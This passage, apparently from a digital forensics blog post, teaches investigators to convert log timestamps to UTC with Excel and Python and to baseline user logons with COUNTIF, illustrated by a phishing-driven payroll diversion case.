Of course, various sources of evidence do not always log time the same way. Some may be local time, some may be UTC, and as mentioned, data from sources in various geographical locations complicates things further. When compiling timelines, it is important to first know whether the evidence source is logged in UTC or local time. If it is logged in local time, we need to confirm which local time zone the evidence source is from. Then we can use the Excel TIME() function to convert timestamps to UTC as needed.

This example scenario is based on a real investigation where the target organization was compromised via phishing email, and employee direct deposit information was changed via an internal HR application. In this situation, we have three log sources: email receipt logs, application logins, and application web logs. 

The email logs are recorded in UTC and contain the following information:

The application logins are recorded in Eastern Daylight Time (EDT) and contain the following:

The application web logs are also recorded in Eastern Daylight Time (EDT) and contain the following:

To take this information and turn it into a master timeline, we can use the CONCAT function (an alternative to the ampersand concatenation used previously) to make a summary of the columns in one cell for each log source, such as this example formula for the email receipt logs:

This is where checking our time zones for each data source is critical. If we took the information as it is presented in the logs and assumed the timestamps were all in the same time zone and created a timeline of this information, it would look like this:

As shown in the previous screenshot, we have some login events to the HR application, which may look like normal activity for the employees. Then later in the day, they receive some suspicious emails. If this were hundreds of lines of log events, we would risk overlooking the login and web log events, because their activity appears to precede our suspected initial compromise vector by a few hours. If this were a timeline used for reporting, it would also be inaccurate.

When we know which time zone our log sources are in, we can adjust the timestamps accordingly to reflect UTC. In this case, we confirmed through testing that the application logins and web logs are recorded in EDT, which is four hours behind UTC, or “UTC-4”. To change these to UTC time, we just need to add four hours to the time. The Excel TIME function makes this easy. We can just add a column to the existing tables, and in the first cell we type “=A2+TIME(4,0,0)”. Breaking this down:

  • =A2
    • Reference cell A2 (in this case our EDT timestamp). Note this is not an absolute reference, so we can use this formula for the rest of the rows.
  • +TIME
    • This tells Excel to take the value of the data in cell A2 as a “time” value type and add the following amount of time to it:
  • (4,0,0)
    • The TIME function in this instance requires three values, which are, from left to right: hours, minutes, seconds. In this example, we are adding 4 hours, 0 minutes, and 0 seconds.
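The same fixed-offset conversion can be sketched in Python with the standard library (the sample timestamp is taken from the earlier file system example):

```python
from datetime import datetime, timedelta

# Convert an EDT (UTC-4) timestamp string to UTC by adding four hours,
# mirroring the Excel formula =A2+TIME(4,0,0).
def edt_to_utc(timestamp: str) -> str:
    local = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S")
    return (local + timedelta(hours=4)).strftime("%Y-%m-%d %H:%M:%S")

print(edt_to_utc("2019-10-14 23:33:45"))  # -> 2019-10-15 03:33:45
```

Note that, like the Excel formula, this applies one fixed offset; it does not account for daylight saving transitions within the data set.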

Now we have a formula that takes the EDT timestamp and adds four hours to it to make it UTC. Then we can replicate this formula for the rest of the table. The end result looks like this:

When we have all of our logs in the same time zone, we are ready to compile our master timeline. Taking the UTC timestamps and the summary events we made, our new, accurate timeline looks like this:

Now we can clearly see suspicious emails sent to (fictional) employees Austin and Dave. A few minutes later, Austin’s account logs into the HR application and adds a new bank account. After this, we see the same email sent to Jake. Soon after this, Jake’s account logs into the HR application and adds the same bank account information as Austin’s. Converting all our data sources to the same time zone with Excel allowed us to quickly link these events together and easily identify what the attacker did. Additionally, it provided us with more indicators, such as the known-bad bank account number to search for in the rest of the logs.
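The compile-and-sort step itself can also be sketched in Python. The entries below are invented placeholders standing in for the three log sources; because ISO-style timestamp strings sort chronologically, a plain sort on tuples produces the master timeline:

```python
# Merge timeline entries from multiple sources and sort by UTC timestamp.
# Each entry: (timestamp, timestamp type, event summary) -- sample data only.
email_logs = [("2019-10-14 12:01:00", "Email Received", "Suspicious email to Austin")]
app_logins = [("2019-10-14 12:05:00", "App Logon", "Austin logon to HR application")]
web_logs   = [("2019-10-14 12:06:00", "Web Request", "POST /account/update")]

# Sorting tuples of strings compares the timestamp field first.
master = sorted(email_logs + app_logins + web_logs)
for timestamp, ts_type, event in master:
    print(timestamp, ts_type, event, sep=" | ")
```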

Pro Tip: Be sure to account for log data spanning changes in UTC offset due to regional events such as daylight saving time. For example, the adjustment for logs recorded in United States Eastern Time (such as Virginia, USA) must change from +TIME(5,0,0) to +TIME(4,0,0) on the second Sunday in March each year, and back from +TIME(4,0,0) to +TIME(5,0,0) on the first Sunday in November, to account for the shifts between daylight and standard time.
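In a scripted workflow, Python's zoneinfo module (Python 3.9+) applies these offset changes automatically from the IANA tz database, so there is no formula to switch twice a year (the sample timestamps are assumptions; "America/New_York" covers US Eastern Time):

```python
from datetime import datetime, timezone
from zoneinfo import ZoneInfo  # Python 3.9+

# Convert a US Eastern local timestamp to UTC; the tz database applies the
# correct EST (UTC-5) or EDT (UTC-4) offset for the date in question.
def eastern_to_utc(timestamp: str) -> str:
    local = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S")
    local = local.replace(tzinfo=ZoneInfo("America/New_York"))
    return local.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")

print(eastern_to_utc("2019-10-14 12:00:00"))  # EDT in effect -> adds 4 hours
print(eastern_to_utc("2019-12-14 12:00:00"))  # EST in effect -> adds 5 hours
```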

CountIf for Log Baselining

When reviewing logs that record authentication in the form of a user account and timestamp, we can use COUNTIF to establish simple baselines to identify those user accounts with inconsistent activity.  

In the example of user logons that follows, we'll use the formula "=COUNTIF($B$2:$B$25,B2)" to establish a historical baseline. Here is a breakdown of the parameters for this COUNTIF formula located in C2 in our example: 

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B$25 
    • This is the entire range of all cells, B2 through B25, that we want to use as a range to search for a specific value. Note the use of "$" to ensure that the start and end of the range are an absolute reference and are not automatically updated by Excel if we copy this formula to other cells. 
  • B2 
    • This is the cell that contains the value we want to search for and count occurrences of in our range of $B$2:$B$25. Note that this parameter is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data and count how many times the user of each logon has logged on in total across all data points. 
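As a rough scripted equivalent, the same per-user totals can be computed with Python's collections.Counter (the usernames below are invented for illustration):

```python
from collections import Counter

# Logon usernames as they would appear in column B of the log data.
logons = ["alice", "bob", "alice", "alice", "bob", "mallory"]

# COUNTIF($B$2:$B$25, B2): total occurrences of each row's username
# across the entire data set.
totals = Counter(logons)
counts_per_row = [totals[user] for user in logons]
print(counts_per_row)  # -> [3, 2, 3, 3, 2, 1]
```

An account such as "mallory", with a count of 1 against a backdrop of regular logons, is the kind of outlier this baseline surfaces.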

When most user accounts log on regularly, a compromised account being used to log on for the first time may clearly stand out when reviewing total logon counts. If we have a specific time frame in mind, it may be helpful to know which accounts first logged on during that time.

The COUNTIF formula can also track accounts through time to identify each account's first logon, which can surface rarely used credentials that were abused for a limited time frame.

We'll start with the formula "=COUNTIF($B$2:$B2,B2)" in cell D2. Here is a breakdown of the parameters for this COUNTIF formula. Note that the use of "$" for absolute referencing is slightly different for the range used, and that is an important nuance:

  • COUNTIF 
    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B2 
    • This is the range of cells, B2 through B2, that we want to start with. Since we want to increase our range as we go through the rows of the log data, the ending cell row number (2 in this example) is not made absolute. As we fill this formula down through the rest of our log data, it will automatically expand the range to include the current log record and all previous logs. 
  • B2 
    • This cell contains the value we want to search for and provides a count of occurrences found in our defined range. Note that this parameter B2 is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data before and including the current log and count how many times the user of each logon has logged on up to that point in time. 
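The running count described above can be sketched in Python as well (again with invented usernames):

```python
from collections import defaultdict

# Logon usernames in chronological order, as in column B.
logons = ["alice", "bob", "alice", "mallory", "alice"]

# COUNTIF($B$2:$B2, B2) filled down: occurrences of each username
# up to and including the current row.
seen = defaultdict(int)
running_counts = []
for user in logons:
    seen[user] += 1
    running_counts.append(seen[user])

print(running_counts)  # -> [1, 1, 2, 1, 3]
# A value of 1 marks the first time each account appears in the logs.
```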

The following example illustrates how Excel automatically updated the range for D15 to $B$2:$B15 using the fill handle.  


To help visualize a large data set, let's add color scale conditional formatting to each row individually. To do so: 

  1. Select only the cells we want to compare with the color scale (such as D2 to D25). 
  2. On the Home menu, click the Conditional Formatting button in the Styles area. 
  3. Click Color Scales. 
  4. Click the type of color scale we would like to use. 

The following examples set the lowest values to red and the highest values to green. We can see how: 

  • Users with lower authentication counts contrast against users with more authentications. 
  • The first authentication times of users stand out in red. 

Whichever colors are used, be careful not to assume that one color, such as green, implies safety and another color, such as red, implies maliciousness.

Conclusion

The techniques described in this post are just a few ways to utilize Excel to perform analysis on arbitrary data. While these techniques may not leverage some of the more powerful features of Excel, as with any skill set, mastering the fundamentals enables us to perform at a higher level. Employing fundamental Excel analysis techniques can empower an investigator to work through the analysis of any presented data type as efficiently as possible.